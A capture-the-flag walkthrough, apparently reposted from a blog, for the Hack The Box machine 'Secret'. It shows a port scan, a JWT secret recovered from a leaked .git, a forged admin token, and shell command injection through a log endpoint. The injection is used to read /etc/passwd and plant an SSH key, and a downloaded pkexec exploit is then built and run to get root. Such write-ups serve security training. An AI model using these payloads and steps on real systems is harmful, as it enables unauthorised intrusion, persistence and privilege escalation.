
[Hack The Box] HTB—Secret walkthrough

Author: Internet


Machine: Hack The Box—Secret


HTB—Secret


I. Information gathering

nmap

nmap -sV 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Deeper scan of the open ports

nmap -sC -sV -n -T5 -p 22,80,3000 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

II. Web application

Following the API documentation, register a user with curl:


curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"name":"xiaozz", "email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/register


Log in:


curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/login


auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoieGlhb3p6IiwiZW1haWwiOiJ4aWFvekBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDU2Njk2NDZ9.dQlJD5uraui5jzOJRvqdJ_5c4PARMhbYbMW-pAz4Ixs

Authentication is done by sending this auth-token header with later requests.


1. JWT forgery

We need admin privileges, so try forging the JWT with jwt.io.


Found the signing secret in .env:

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret


TOKEN_SECRET = secret is not the real value. There is a .git leak, so try recovering the repository from .git; a handy tool for this is gakki429/Git_Extract: a tool for extracting a leaked remote .git or a local .git (github.com).

python2 git_extract.py ../.git


The real TOKEN_SECRET:

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE


The related code is in local-web\routes\private.js:

const { exec } = require('child_process');
const router = require('express').Router();
// verifytoken: the project's JWT middleware (defined elsewhere in local-web);
// it decodes the auth-token header and stores the claims in req.user.

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;              // attacker-controlled query parameter
    const userinfo = { name: req.user }
    const name = userinfo.name.name;          // "name" claim read straight from the JWT
    
    if (name == 'theadmin'){
        // file is interpolated unescaped into a shell command line: command injection
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

module.exports = router;

The check is name == 'theadmin', so change the name claim in the JWT accordingly.


The admin JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4

Logged in as admin successfully; after logging in, look at http://10.10.11.120:3000/api/logs


2. Command execution

The line const getLogs = `git log --oneline ${file}`; in private.js gives command execution: the file parameter is interpolated unescaped into a shell command line.

http://10.10.11.120:3000/api/logs?file=123;whoami;


The reverse shell failed. Other writeups write an SSH public key instead (from /etc/passwd, the user we are running as has a login shell).

curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  'http://10.10.11.120/api/logs?file=index.js;id;cat+/etc/passwd' | sed 's/\\n/\n/g'

The sed 's/\\n/\n/g' turns the escaped \n sequences in the JSON response into real line breaks.



3. Writing an SSH public key

On the Kali attack machine:

ssh-keygen -t rsa                      # generate an SSH key pair on the attack machine; leave the passphrase empty
cd /root/.ssh
export PUBLIC_KEY=$(cat id_rsa.pub)    # store the public key in a bash variable

Then the commands to run on the target:

mkdir -p /home/dasith/.ssh
echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys


With curl (-i shows the response headers, -G sends the data as a GET query string, and --data-urlencode URL-encodes the file parameter):

curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  -G \
  --data-urlencode "file=123;mkdir -p /home/dasith/.ssh;echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys" \
  'http://10.10.11.120/api/logs'


SSH login:

ssh dasith@10.10.11.120


Got the user flag.


III. Privilege escalation

As usual, run linpeas.sh.


It reports the pkexec privilege escalation, CVE-2021-4034.

Start an HTTP server on the attack machine:

python3 -m http.server 8080

Transfer the files to the target, build and run:

wget http://10.10.14.25:8080/Makefile
wget http://10.10.14.25:8080/cve-2021-4034.c
wget http://10.10.14.25:8080/pwnkit.c
make
./cve-2021-4034


Got the root flag.



Reference writeup:

https://drt.sh/posts/htb-secret/

Source: https://blog.csdn.net/weixin_46081055/article/details/123115290